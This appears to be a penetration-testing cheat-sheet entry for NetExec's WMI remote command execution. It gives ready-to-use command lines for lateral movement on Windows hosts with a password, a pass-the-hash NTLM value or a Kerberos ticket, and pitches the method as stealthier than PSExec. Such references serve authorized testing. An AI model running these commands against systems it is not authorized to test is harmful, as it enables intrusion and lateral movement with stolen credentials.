NetExec WMI Command Execution

Execute a command on a Windows host over WMI. WMI exec is often allowed in environments where SMB / WinRM is locked down and is a useful stealthier alternative to PSExec.

Tool
nxc
Category
Lateral Movement / Remote Shells
Platform
linux
Requires
password
Protocols
WMI

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

nxc wmi <ip> -u <user> -p <password> -x '<command>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

nxc wmi <ip> -u <user> -H <hash> -x '<command>'

Kerberos (ccache) requires Kerberos ticket

KRB5CCNAME=<ccache> nxc wmi <ip> -u <user> -k --use-kcache -x '<command>'

Examples

nxc wmi 10.10.10.10 -u administrator -p 'Password123!' -x 'whoami /priv'
nxc wmi 10.10.10.10 -u admin -H :e19ccf75ee54e06b06a5907af13cef42 -x 'tasklist /v'

Tags

nxc netexec wmi execution lateral-movement

References